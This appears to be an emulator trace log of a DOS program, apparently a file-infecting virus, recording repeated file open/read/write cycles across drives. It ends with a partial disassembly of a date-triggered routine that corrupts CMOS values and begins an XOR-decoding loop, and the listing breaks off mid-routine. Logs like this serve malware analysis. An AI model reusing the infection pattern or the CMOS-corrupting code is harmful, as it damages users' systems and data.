2018-12-25T12:43:33.471762287Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:33.764997176Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:33.769235748Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:33.920046553Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:33.923057735Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:33.925569109Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:34.021266978Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:34.028603602Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:34.046373713Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:34.047822367Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:34.050862434Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:34.054708473Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:34.056673518Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:34.058351385Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:34.067234713Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:34.070427318Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:34.078445226Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:34.081273779Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:34.08323863Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:34.095213161Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:34.103257036Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:34.11108026Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:34.112456142Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:34.115101696Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:34.120348637Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:34.12254529Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:34.124628678Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:34.133991611Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:34.136227306Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:34.144256525Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:34.148056218Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:34.149354365Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:34.158928724Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:34.168715824Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:34.175021601Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:34.176668789Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:34.180311028Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:34.182925855Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:34.18427589Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:34.186566788Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:34.195558638Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:34.197906261Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:34.206637443Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:34.2093295Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:34.210508729Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:34.221316065Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:34.227829645Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:34.234401987Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:34.236749855Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:34.239652064Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:34.242483763Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:34.244876778Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:34.246492428Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:34.254456582Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:34.258308211Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:34.266418362Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:34.269262837Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:34.27144626Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:34.281301302Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:34.287992625Z 63 PC: 13e96 | Read file or device (Read 1 bytes on handle 5)
2018-12-25T12:43:34.291585565Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:34.294031629Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:34.296674407Z 25 PC: 13f9b | Get default drive
2018-12-25T12:43:34.298188121Z 14 PC: 13fc7 | Set default drive (Drive = 'C')
2018-12-25T12:43:34.300589629Z 59 PC: 13fce | Change current directory
2018-12-25T12:43:34.30640275Z 78 PC: 13fd5 | Find first file
2018-12-25T12:43:34.315293248Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:34.317829711Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:34.730618022Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:34.737591124Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:34.745090442Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:34.746882258Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:34.74996756Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:34.754366753Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:34.756183002Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:34.757941367Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:34.769882047Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:34.772707663Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:34.779722817Z 79 PC: 13fe1 | Find next file
2018-12-25T12:43:34.783689096Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:34.785421037Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:34.794638656Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:34.803717084Z 63 PC: 13e96 | Read file or device (See above)
2018-12-25T12:43:34.809262993Z 66 PC: 13ea7 | Move file pointer
2018-12-25T12:43:34.810867342Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:34.814047306Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:34.827629642Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:34.830520438Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:34.833540497Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:34.835288559Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:34.836963679Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:34.844523292Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:34.847145301Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:34.854097973Z 79 PC: 13fe1 | Find next file (See above)
2018-12-25T12:43:34.857304406Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:34.859107832Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:34.8692673Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:34.875911621Z 63 PC: 13e96 | Read file or device (See above)
2018-12-25T12:43:34.882325533Z 66 PC: 13ea7 | Move file pointer (See above)
2018-12-25T12:43:34.883777058Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:34.886216662Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:34.887762313Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:34.890090034Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:34.892599293Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:34.894022563Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:34.89525495Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:34.902430473Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:34.904436549Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:34.911230057Z 79 PC: 13fe1 | Find next file (See above)
2018-12-25T12:43:34.916896593Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:34.918499244Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:34.927560995Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:34.934835101Z 63 PC: 13e96 | Read file or device (See above)
2018-12-25T12:43:34.94069065Z 66 PC: 13ea7 | Move file pointer (See above)
2018-12-25T12:43:34.941838303Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:34.944310668Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:34.946168004Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:34.948564687Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:34.950933017Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:34.952964439Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:34.954317409Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:34.961052163Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:34.963569079Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:34.970185872Z 79 PC: 13fe1 | Find next file (See above)
2018-12-25T12:43:34.975830665Z 14 PC: 13ff0 | Set default drive (Drive = 'A')
2018-12-25T12:43:34.977221384Z 42 PC: 13ff4 | Get date 0x13ff4: cmp al, 4
0x13ff6: jne 0x1404a
0x13ff8: mov dx, 0x70
0x13ffb: mov ax, cx
0x13ffd: out dx, ax
0x13ffe: mov dx, 0x71
0x14001: in al, dx
0x14002: inc al
0x14004: out dx, al
0x14005: loop 0x13ff8
0x14007: push es
0x14008: push bp
0x14009: mov dx, word ptr [0xffb7]
0x1400d: add dx, 0x100
0x14011: add dx, 0x265
0x14015: sub dx, 0x2a
0x14018: mov bx, dx
0x1401a: mov cx, 0
0x1401d: mov al, byte ptr [bx]
0x1401f: xor al, 0x36